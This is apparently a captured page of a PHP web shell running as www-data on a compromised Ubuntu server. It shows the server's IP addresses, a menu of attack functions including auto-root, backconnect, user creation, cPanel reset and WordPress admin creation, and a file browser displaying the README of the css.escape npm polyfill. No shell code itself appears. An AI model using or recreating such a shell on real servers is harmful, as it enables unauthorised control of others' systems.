Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
css.escape /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE-MIT.txt
1.05
KB
-rw-rw-rw-
README.md
1.27
KB
-rw-rw-rw-
css.escape.js
3.08
KB
-rw-rw-rw-
package.json
956
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# `CSS.escape` polyfill [](https://travis-ci.org/mathiasbynens/CSS.escape) [](https://coveralls.io/r/mathiasbynens/CSS.escape) A robust polyfill for [the `CSS.escape` utility method as defined in CSSOM](https://drafts.csswg.org/cssom/#the-css.escape%28%29-method). For a more powerful alternative, consider using [cssesc](https://mths.be/cssesc), which automatically takes care of excessive whitespace, and has many options to customize the output. ## Installation In a browser: ```html <script src="css.escape.js"></script> ``` Via [npm](https://www.npmjs.com/): ```bash npm install css.escape ``` Then, in [Node.js](https://nodejs.org/): ```js require('css.escape'); // On Windows and on Mac systems with default settings, case doesn’t matter, // which allows you to do this instead: require('CSS.escape'); ``` ## Author | [](https://twitter.com/mathias "Follow @mathias on Twitter") | |---| | [Mathias Bynens](https://mathiasbynens.be/) | ## License This polyfill is available under the [MIT](https://mths.be/mit) license.
Close